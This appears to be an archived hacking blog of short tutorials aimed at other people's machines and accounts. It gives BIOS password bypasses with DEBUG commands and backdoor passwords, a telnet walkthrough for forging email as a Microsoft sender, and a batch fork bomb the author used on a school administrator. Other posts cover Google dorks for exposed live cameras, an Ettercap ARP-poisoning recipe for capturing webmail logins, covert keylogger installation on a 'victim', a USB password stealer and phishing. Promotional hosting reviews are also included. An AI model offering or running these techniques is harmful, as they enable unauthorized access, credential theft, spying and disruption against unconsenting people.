GLOBAL HACKERS

Basic BIOS password crack

By Anonymous March 30, 2010 No comments

bios This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:

Get DOS prompt and type:

Code:

DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter

Restart the computer. It works on most versions of the AWARD BIOS.

Accessing information on the hard disk

When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.

Standard BIOS backdoor passwords

The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer’s backdoor passwords:

AWARD BIOS

AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet

AMI BIOS

AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder

Other passwords you may try (for AMI/AWARD or other BIOSes)

LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj

Note that the key associated to “_” in the US keyboard corresponds to “?” in some European keyboards (such as Italian and German ones), so — for example — you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.

Flashing BIOS via software

If you have access to the computer when it’s turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory. However, it might happen you don’t have one of those programs when you have access to the computer, so you’d better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You’d better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:

AMI/AWARD BIOS

Code:

O 70 17
O 71 17
Q

PHOENIX BIOS

Code:

O 70 FF
O 71 17
Q

GENERIC

Invalidates CMOS RAM.

Should work on all AT motherboards

(XT motherboards don’t have CMOS)

Code:

O 70 2E
O 71 FF
Q

Note that the first letter is a “O” not the number “0″. The numbers which follow are two bytes in hex format.

Flashing BIOS via hardware

If you can’t access the computer when it’s on, and the standard backdoor passwords didn’t work, you’ll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.

Using the jumpers

The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for “switching a jumper” I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard. To find the correct jumper you should read the motherboard’s manual.

Once you’ve located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.

If you don’t have the motherboard’s manual, you’ll have to “brute force” it… trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don’t know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.

If after flashing the BIOS, the computer won’t boot when you turn it on, turn it off, and wait some seconds before to retry.

Removing the battery

If you can’t find the jumper to flash the BIOS or if such jumper doesn’t exist, you can remove the battery that keeps the BIOS memory alive. It’s a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you’ll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I’d suggest you to remove it for about one hour to be sure, because if you put it back when the data aren’t erased yet you’ll have to wait more time, as you’ve never removed it. If at first it doesn’t work, try to remove the battery overnight.

Important note: in laptop and notebooks you don’t have to remove the computer’s power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.

Short-circuiting the chip

Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.

Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.

CHIPS P82C206 (square)

Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).

Code:

       gnd
       74
        |__________________
5v 75--|                   |
       |                   |
       |                   |
       |       CHIPS       |
   1 * |                   |
       |      P82C206      |
       |                   |
       |                   |
       |___________________|
        |                 |
        | gnd             | 5v
        12                32

OPTi F82C206 (rectangular)

Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).

Code:

    80              51
     |______________|
81 -|                |- 50
    |                |
    |                |
    |      OPTi      |
    |                |
    |     F82C206    |
    |                |
100-|________________|-31
     ||           | |
   1 ||           | | 30
      3           26

Dallas DS1287, DS1287A

Benchmarq bp3287MT, bq3287AMT

The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can’t flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.

CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.

The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can’t be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.

Code:

         __________
     1 -| *  U     |-  24 5v
     2 -|          |-  23
     3 -|          |-  22
     4 -|          |-  21 RCL (RAM Clear)
     5 -|          |-  20
     6 -|          |-  19
     7 -|          |-  18
     8 -|          |-  17
     9 -|          |-  16
    10 -|          |-  15
    11 -|          |-  14
gnd 12 -|__________|-  13

NOTE: Although these are 24-pin chips,

the Dallas chips may be missing 5 pins,

these are unused pins.

Most chips have unused pins,

though usually they are still present.

Dallas DS12885S

Benchmarq bq3258S

Hitachi HD146818AP

Samsung KS82C6818A

This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818. Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.

Short together pins 12 and 24.

Code:

5v
 24          20                   13
 |___________|____________________|
|                                  |
|             DALLAS               |
|>                                 |
|            DS12885S              |
|                                  |
|__________________________________|
 |                                |
 1                                12
                                  gnd

Motorola MC146818AP

Short pins 12 and 24. These are the pins on diagonally opposite corners – lower left and upper right. You might also try pins 12 and 20.

Code:

          __________
     1  -| *  U     |-  24 5v
     2  -|          |-  23
     3  -|          |-  22
     4  -|          |-  21
     5  -|          |-  20
     6  -|          |-  19
     7  -|          |-  18
     8  -|          |-  17
     9  -|          |-  16
    10  -|          |-  15
    11  -|          |-  14
gnd 12  -|__________|-  13

Replacing the chip

If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It’s a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you’ll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you’ll then plug the new chip, in the eventuality that you’ll have to change it again. If you can’t find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer’s website to see if there’s the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.

Important

Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.

Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you’ll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn’t see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can’t find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .

Key Disk for Toshiba laptops

Some Toshiba notebooks allow to bypass BIOS by inserting a “key-disk” in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it’s not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for “KEY” followed by two zeroes). Once you have created the key disk put it into the notebook’s drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You’ll enter the BIOS configuration where you can set a new password.

Key protected cases

A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.

How to send fake email / Email Forging

By Anonymous March 30, 2010 No comments

email Most of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain. But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorized access. Also many of the websites offer you to send fake email from their sites where none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. SMTP server is a simple software program which can be installed on your computer in few seconds. SMTP server allows you to send fake email right from your desktop easily and effectively. Download QK SMTP server HERE. This is the SMTP server i am using in my tutorial. Once you download and install the server on your comp then you are all set to send fake email successfully.

PART A: CONFIGURING SMTP SERVER

Once you have installed the QK SMTP server on your comp you must perform the following configuration.

1. Click on “Settings” button on the main screen,the Settings window pops up

2. On Settings window click on “Basic Parameter” tab

3. Set binding IP to “127.0.0.1?

4. Set port to “25?

PART B: SENDING FAKE EMAIL (EMAIL FORGING)

1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored

2. Goto command prompt(Start-Accessories-Command prompt)

3. Type exactly as follows

C:>telnet 127.0.0.1 25

Here 127.0.0.1 is the default IP of every computer.25 is the port number. SO you are connecting to the SMTP server running on your own computer.This step is very important to send fake email.

NOTE: The IP 127.0.0.1 should not be substituted by any other IP.

Heres the snapshot of what you see after step 3. Click on it to enlarge

qk_smtp-1

4. After typing the telnet command in the command prompt you get entry to the server which displays the following message. The response of a OK SMTP server is given below. Message within Green color is only explanation.

220 Welcome to QK SMTP Server 3

helo hacker (Type helo & any name followed by space)

250 Hello hacker (Server Welcomes You)

mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake email appears to have come from)

250 billg@microsoft.com Address Okay (Server gives a positive response)

rcpt to:admin@gmail.com (Type any valid recipient email address)

250 admin@gmail.com Address Okay (Server gives a positive response)

data (type this command to start input data)

354 Please start mail input

From:Gates <billg@microsoft.com>

To:admin@gmail.com

Date:Sat Jan 5,2008 9:45 PM

Subject:Test to send fake email

You can create as many headers followed by the “:” symbol.

NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data

<HERE IS YOUR DATA>End the body of email by pressing [ENTER] .(dot) [ENTER]

250 Mail queued for delivery (Sever indicates that the email is ready for sending)

quit (Type this command to quit from server)

221 Closing connection. Good bye.

Connection to host lost

(You will get the above 2 lines of message after typing “quit” command)

(Your fake email is sent to the recipient)

*****END OF EMAIL FORGING*****

How to make a Fork Bomb (Rabbit Virus)

By Anonymous March 30, 2010 No comments

fork bomb Introduction

Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.

A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.

Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.

Background

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.

The code

Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt

One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…

Blocks of code should be set as style “Formatted” like this.

:s

START %0

GOTO :s

Have fun guys and do leave your feedback about this article!

How to make a Virus File Undetected By Antivirus Programs

By Anonymous March 30, 2010 No comments

This video tutorial explains you in detail “how to make an infected file undetectable” just by doing some splitting and hexing!!

How to Hack into a Live Security Camera

By Anonymous March 30, 2010 No comments

3684234620 14174a66d9 How to Hack into a Live Security Camera Well this is an interesting article. It is a sub-section of a Hacking Technique known as “Google Hacking”. All what we are looking at are unsecured cams from around the world that are interfaced with the internet. So how do you find such cameras. Just google these following strings and select any result. Whoa, you can see a live cam on your PC screen!! The strings are given below:

inurl:”CgiStart?page=”

inurl:/view.shtml

intitle:”Live View / – AXIS

inurl:view/view.shtml

inurl:ViewerFrame?Mode=

inurl:ViewerFrame?Mode=Refresh

inurl:axis-cgi/jpg

inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)

inurl:view/indexFrame.shtml

inurl:view/index.shtml

inurl:view/view.shtml

liveapplet

intitle:”live view” intitle:axis

intitle:liveapplet

allintitle:”Network Camera NetworkCamera” (disconnected)

intitle:axis intitle:”video server”

intitle:liveapplet inurl:LvAppl

intitle:”EvoCam” inurl:”webcam.html”

intitle:”Live NetSnap Cam-Server feed”

intitle:”Live View / – AXIS”

intitle:”Live View / – AXIS 206M”

intitle:”Live View / – AXIS 206W”

intitle:”Live View / – AXIS 210?

inurl:indexFrame.shtml Axis

inurl:”MultiCameraFrame?Mode=Motion” (disconnected)

intitle:start inurl:cgistart

intitle:”WJ-NT104 Main Page”

intitle:snc-z20 inurl:home/

intitle:snc-cs3 inurl:home/

intitle:snc-rz30 inurl:home/

intitle:”sony network camera snc-p1?

intitle:”sony network camera snc-m1?

site:.viewnetcam.com -www.viewnetcam.com

intitle:”Toshiba Network Camera” user login

intitle:”netcam live image” (disconnected)

intitle:”i-Catcher Console – Web Monitor”

Happy Cam Hacking Guys!!

Sniffing Tutorial

By Anonymous March 30, 2010 No comments

3744959095 82778f4802 Sniffing Tutorial

Hi, Today I am posting a tutorial on Sniffing which can be done using “BACKTRACK” . You can download Backtrack from here.

I prefer using Backtrack 3.0 Final version.

Well lets start with sniffing. If you don’t know what sniffing is, then click here.

Tools you need are:

Ettercap

nano

1. For SSL Dissection support (hotmail,gmail), you need to do this:

Open a shell, type: “nano /usr/local/etc/etter.conf”, use the down arrow until you reach “redir_command_on/off”, look at the linux part, your gonna need to uncomment:

Code:

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

to:

Code:

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

after your done, press F2, Y, Return.

Now boot Ettercap: Menu –> Backtrack –> Spoofing –> Ettercap

Go to: Sniff –> Unified Sniffing –>ethX(what interface you want to sniff).

Then Press: Ctrl+S to scan hosts.

Then Go to: Mitm –> ARP poisoning, select sniff remote connections, and press ok.

Then Go to: Start –> Start Sniffing.

For an Example, Walk to another pc, go to your internet email account (Hotmail, Gmail), and log in, you will be asked to trust the certificate, Trust it, and watch your sniffing computer, the username and password should appear.

When your done, go to Start –> Stop Sniffing, And go to Mitm –> Stop mitm attack(s)

Download Free Softwares, Games, Movies and lot of Hacking Stuff from 50+ FTP Sites

By Anonymous March 30, 2010 No comments

3752370229 c162e52d2c Download Free Softwares, Games, Movies and lot of Hacking Stuff from 50+ FTP Sites

Internet definitely has several unheard places also known as underground websites, few of these website offer users 100s and 1000s of softwares, games, movies and lot of Hacking Stuff for downloads. Though these sites are pretty tough to find, I was able to unearth more than 50+ FTP sites that allow users to download softwares, games, movies and lot of Hacking tools for free.

Here is a list of 50+ FTP sites that will allow you download content for free. Don’t forget to share and bookmark this page so that everyone can take advantage of it.

1. ftp://ftp.freenet.de/pub/filepilot/

2. ftp://193.43.36.131/Radio/MP3/

3. ftp://195.216.160.175/

4. ftp://207.71.8.54:21/games/

5. ftp://194.44.214.3/pub/music/

6. ftp://202.118.66.15/pub/books

7. ftp://129.241.210.42/pub/games/

8. ftp://clubmusic:clubmusic@217.172.16.3:8778/

9. ftp://212.174.160.21/games

10. ftp://ftp.uar.net/pub/e-books/

11. ftp://129.241.210.42/pub/games/

12. ftp://193.231.238.4/pub/

13. ftp://207.71.8.54/games/

14. ftp://194.187.207.98/video/

15. ftp://194.187.207.98/music/

16. ftp://194.187.207.98/soft/

17. ftp://194.187.207.98/games/

18. ftp://ftp.uglan.ck.ua/

19. ftp://159.153.197.74/pub

20. ftp://leech:l33ch@61.145.123.141:5632/

21. ftp://psy:psy@ftp.cybersky.ru

22. ftp://130.89.175.1/pub/games/

23. ftp://194.44.214.3/pub/

24. ftp://195.116.114.144:21/

25. ftp://64.17.191.56:21/

26. ftp://80.255.128.148:21/pub/

27. ftp://83.149.236.35:21/packages/

28. ftp://129.241.56.118/

29. ftp://81.198.60.10:21/

30. ftp://128.10.252.10/pub/

31. ftp://129.241.210.42/pub/

32. ftp://137.189.4.14/pub

33. ftp://139.174.2.36/pub/

34. ftp://147.178.1.101/

35. ftp://156.17.62.99/

36. ftp://159.153.197.74/pub/

37. ftp://193.140.54.18/pub/

38. ftp://192.67.63.35/

39. ftp://166.70.161.34/

40. ftp://195.161.112.15/musik/

41. ftp://195.161.112.15/

42. ftp://195.131.10.164/software

43. ftp://195.146.65.20/pub/win/

44. ftp://199.166.210.164/

45. ftp://195.46.96.194/pub/

46. ftp://61.136.76.236/

47. ftp://61.154.14.248/

48. ftp://62.210.158.81/

49. ftp://62.232.57.61/

50. ftp://212.122.1.85/pub/software/

51. ftp://193.125.152.110/pub/.1/misc/sounds/mp3/murray/

Top 10 Facebook Hacks

By Anonymous March 30, 2010 No comments

Facebook Hack

Facebook has become very famous in last 1 year. Orkut which was considered to be the best Social networking website has been sidetracked by emerging Social Networking Websites like Facebook and Twitter. Considering the popularity of Facebook we have collected the Most Essential Hacks of Facebook and presented them to you.

1.How to View the Album of Any User Even if it is Private

You can use this script to view a photo in the original album, even if you’re not friends with the person.

Get it Here

2. How to Remove Annoying Facebook Advertisement

Get rid of some of the Facebook advertising and sponsored by sections with this tool.

Get it Here

3. How to see Real Profiles from Public Pages

This script redirects to real profiles from the Facebook people pages (public profiles). There is a risk of an infinite redirect loop if not logged in, so be logged in.

Get it Here

4. How to Undo Facebook Changes

If you hate some or all of the new Facebook changes, undo them with these scripts and use what you liked previously.

Get it Here

5. How to View All the Photos from a Person

You can search for pictures of a Facebook member who has tight privacy settings and view all his/ her pictures without his/ her consent.

Get it Here

6. How to Find More Friends at Facebook

Suppose some of your friends have newly joined Facebook and you didn’t even knew. Use this script and it will help you go through your friends’ friends list and find them out.

Get it Here

7. How to Share Files from Facebook

With this box widget, you can share files from your computer through Facebook. Isn’t it great?

Get it Here

8. How to Get a Job from Facebook

Looking for a job? This application gives Facebook users unique access to job information, networking opportunities and other career resources.

Get it Here

9. How to Tighten up the Privacy and still Maintain Communication Convenience

The Private Wall combines the best of both worlds of Facebook: online convenience and communication with more serious privacy settings.

Get it Here

10 How to Cheat Facebook Texas Hold em Poker

This is one of my Favorite hacks and that is why I have saved it for the last one. Using this software you can see the cards of any player and the advanced version of this software allows you to even add credits to your account for free.

Get it Here

Reveal hidden passwords under asterisks for free

By Anonymous March 28, 2010 No comments

shot-asterisk

College labs, Cyber cafes are a good source of saved passwords. People either save their passwords unknowingly sometimes as the “Remember my password” is checked by default or when the settings of the browser are set to saving the password automatically.

Accessing their email accounts, social networking profiles etc becomes easier but most of the times its difficult to change or know those passwords as they are under asterisks and changing the password required you to enter the old password.

This is where Asterisk Key comes in handy. Its a free software which shows you the password behind asterisks in the ACTIVE INTERNET EXPLORER window. It however, doesn’t work in firefox or chrome but only Internet Explorer.

Download Asterisk Key (454KB)

Stay tuned as I’ll post on how to use Asterisk Key and retrieve MTNL broadband internet password of any user.

Phishing Tutorial: Explained stepwise

By Anonymous March 28, 2010 No comments

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT Administrators are commonly used to lure the unsuspecting. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake.

How do The Crackers Crack IM, E-Mail and other accounts?

By Anonymous March 28, 2010 No comments

The most frequent questions asked by many people especially in a chat room is How To Hack Yahoo Password or any other email account.So you as the reader are most likely reading this because you want to break into somebody’s email account.Here are some of the tricks that can be used to track an email password.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

There is no program that will crack the password of victim’s account.There exist many password hacking programs which claims to do this,but unfortunately people using these kind of programs will only end up in frustration.

None of these programs work since services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts.Another thing you must know if you ask this question in any “hacker” chat room/channel, you hear that you have to email some address and in any way you give up your password in the process, in attempt to crack others password.So DO NOT BELEIVE THIS.

TWO WAYS OF HACKING METHODS THAT YOU CAN TRY

IF YOU HAVE ACCESS TO VICTIM’S COMPUTER

If you have physical access to victim’s computer then it’s definitely possible to crack his password.This can easily be done by just installing a keylogger.

What is a keylogger? A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard.

A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.OK we can crack passwords using a keylogger but these are the questions that arise in our mind now!

1.Where is the keylogger program available?

A keylogger program is widely available on the internet.some of them are listed below

Powered Keylogger

Advanced keylogger

Elite Keylogger

Handy Keylogger

Quick Keylogger

Oops i think the above list is enough.There exists hundreds of such keyloggers available on the net.These are software keyloggers.There are also hardware Keyloggers available which can be directly attached to computer and can be used to sniff valuable data.These programs are none other than spyware! So use it @ your own risk.

2.How to install it?

You can install these keyloggers just as any other program but these things you must keep in mind.While installing,it asks you for a secret password and a hot key to enable it.This is because after installing the keylogger program is completely hidden and the victim can no way identify it.Keylogger is hidden from control panel,Program files,Start menu,Task manager so that it becomes completely invisible but runs in background monitoring the user activities.

3.Once installed how to get password from it?

The hacker can open the keylogger program by just pressing the hot keys(which is set during installation) and enter the password.Now it shows the logs containing every keystroke of the user,where it was pressed,at what time,including screenshots of the activities.

Some keyloggers also has a built in SMTP server.So once you install the keylogger on victim’s computer you can just sit back in our place and receive the logs via email

4.Which keylogger program is the best?

According to me Elite Keylogger and Powered keylogger are the best.You can also read the features and side by side comparisions of them and select the best that suites your needs.

IF YOU DO NOT HAVE ACCESS TO VICTIM’S COMPUTER

Ofcourse the above method can only be employed if you can access victims computer.But what to do if we do not have access.In this case there exists many Remote Administration Tools commonly known as RATs available on net.Just try googling and you can get one.

OTHER WAYS OF HACKING PASSWORD

The other most commonly used trick to sniff password is using Fake Login Pages or Phishers.

This is where many people get cheated.A Fake Login page or a Phisher is a page that appears exactly as a Login page but once we enter our password there ,we end up loosing it.

Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & password) are redirected to remote server and we get an error “Page cannot be displayed”.Many times we ignore this but finally we loose our valuable data.

KeyLoggers: (Keystroke Loggers)

By Anonymous March 28, 2010 No comments

Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.
There are two types of keystroke loggers:
1. Software based and
2. Hardware based.

USB Password Stealer: USB Steals Pc Passwords

By Anonymous March 28, 2010 No comments

Tweaked USB that steals every password including licenses.

Instructions

1.Download and Decompress the rar file and put all the files located in the folder “USBThief” into a USB. (You MUST put all from USBThief directory in main directory of usb, no folders no anything, just simply copy and paste)

2.Insert the USB in your victim’s computer.

3.View folder “dump” to see the passwords. It also makes a second dump folder in the batexe folder. Tested and Working perfectly!

No Password in the USBThief.rar file.

Can be detected by some anti virus programs!!

Page Hits Flooder: Increase your page hits by flooding

By Anonymous March 28, 2010 No comments

This small program can flood your page hits.

but you have to dedicate one browser for it.. like internet explorer

Hostmonster Coupon Review

By Anonymous March 28, 2010 No comments

4285494474 c3619d37b7 o Hostmonster Coupon Review

Do you want a Hostmonster Coupon?

As most of you are aware (or not who knows), Hostmonster.Com is a sister company of Bluehost. If you like Bluehost or have seen their services recommended, then you will be happy to know that Hostmonster offers the same great service. Moolahology is happy to help you make the right choice when it comes to web hosting.

Why do you save with Hostmonster? Let’s look at some of the facts…

Using the coupon link in the first paragraph, you are only going to pay a measly $3.95 per month. That is almost half the cost of most of the major hosting networks. After all, Hostmonster isn’t going to cut down on quality simply because the price is a little lower. On top of that, you also get a free domain name with unlimited domain hosting, plus an unlimited amount of Gigs for site transer. That’s service you can depend on.

Hostmonster has a reliable track record too. You won’t find very many unhappy people that used their hosting. You will always find someone who is unhappy with a company, that’s just the facts of life. What you want to make sure on is whether or not there is a large portion of unsatisfied folks. If there isn’t, that’s good news.

Another good reason to use Hostmonster is that they offer their customer quad core processing servers. If you know anything about web hosting, it is that CPU power generally is used before more Ram on a server – depending of course on the clients needs. In this case, since it is shared hosting, top notch CPUs are what is used. Not to bad huh?

They are known to keep on top of their updates and as such, always have the latest version of PHP etc… and they even give a SSL secure server for those of you wishing to run an e-commerce operation. That’s a sweet bang for the buck, especially at $3.95 a month. Where else can you get all of these goodies?

Now I know you can go anywhere for web hosting, but why not use the Hostmonster coupon I gave you? Heck you can always refund if you don’t like them. The reason I put this article together is for other people’s benefit. I’m not blowing hot air here (well typing not speaking I suppose) for nothing. Get yourself a reliable webhost today. Sign up with Hostmonster below or find another provider – either web, the web awaits you.

If you have any questions, feel free to give me a shout. I’m always on this site and if I see you wrote a question I’ll be happy to help in any way I can. Well, you can always give a shout out even if you don’t have a question about Hostmonster of their hosting packages. All the best in your web journeys.

PickaWeb Review

By Anonymous March 28, 2010 No comments

They provide first class internet services. They are experts in their field and they are dedicated to being the best.

That is why thousands of people and businesses have joined them since the year 2000. Their friendly & experienced staff are standing by, 24 hours a day, should you have any questions.

Formed in 2000 Pickaweb is one of the pioneers of UK web hosting.

Wholly owned by their original team, Pickaweb has demonstrated consistent growth in the subsequent period by offering low cost, high quality domain & hosting services.

By concentrating on the Small to Medium Sized Enterprise (SME) market Pickaweb has established itself as a key player in this market by maintaining a high value offering in terms of service & reliability through our relationships with major suppliers such as Tucows & CPanel.

Their services are backed up by their friendly & knowledgeable 24 hour support team who are at hand to support you via phone, live chat or email.

Products and services they offer include:

Web hosting: High quality web hosting services with 24×7 technical support via chat, phone and email.

All their packages come with the latest features including Cpanel control panel to manage your hosting account in real time.

Domain Name: Instant domain name registrations. They have registered thousands of domain names and are experts in the field.

They are pleased to assist you regarding any domain name queries you may have.

GPS Tracking Systems By LandAirSea

By Anonymous March 28, 2010 No comments

Those days are gone when GPS tracking had a scope only for the private detectives and businessmen. GPS Tracking is now made easy with the LandAirSea GPS Tracking systems. GPS has become a widely used aid to navigation worldwide. A GPS records the position of a certain thing and determines its location and it’s usually used in vehicle or asset tracking. LandSeaAir makes it even easier.

LandSeaAir provides us a passive tracking device which can automatically log a route information of any vehicle or object for up to 30 days. The tools from LandAirSea are even compatible with Google Earth. LandAirSea provides us tracking systems like “GPS Tracking Key Pro”, “GPS Tracking Key” and many more in the list which are very affordable too. On their website they also provide the demo of these systems and also can help you find the locations to buy these superb affordable GPS devices worldwide.

LandAirSea provides:

1. Passive GPS Tracking

2. Real Time GPS Tracking

3. GPS Tracking with Google Earth

4. Fleet Management

5. Vehicle Tracking

6. GPS Teen Tracking

And Yeah! You can buy the products online too. On the main website of LandAirSea, you can also find and read the testimonials written by it’s various customers and can read their experience with LandAirSea GPS Navigation Systems and services.

The Future security mobile botnets take over ipone just with A SMS

By Anonymous November 15, 2009 No comments

Today at the cybersecurity conference known as Black Hack, researchers Charlie Miller and Collin Mulliner will present an SMS exploit that could take over your iPhone with just one text. Once the phone is compromised, the hacker would have access to all the functions on the phone allowing them to send email, access your contacts, make phone calls, and of course, send text messages that would send the exploit to more devices.

This serious vulnerability (which apparently Apple sat on for over a month) is probably the first time that most people have heard of mobile phones being used to create botnets. However, this isn't the first sighting of a mobile phone hijacking attempt for the purpose of botnet creation - a similar exploit was discovered earlier this month. Does this mean we're on the verge of a new and dangerous trend: the creation of "zombie" phones?

The iPhone SMS Hack

According to Forbes, the SMS exploit being demonstrated at Black Hat today involves sending short, mostly invisible SMS bursts which would allow a potential hacker to entirely take over the phone. The only warning you would have to alert you to the hack would be a text messaging that contained a single square character. If you received something like that, your only recourse would be to turn the phone off immediately.

The researchers said they alerted Apple to this vulnerability over a month ago, but no patch has been released. Apple isn't returning calls requesting a comment, either.

The First Mobile Botnet?

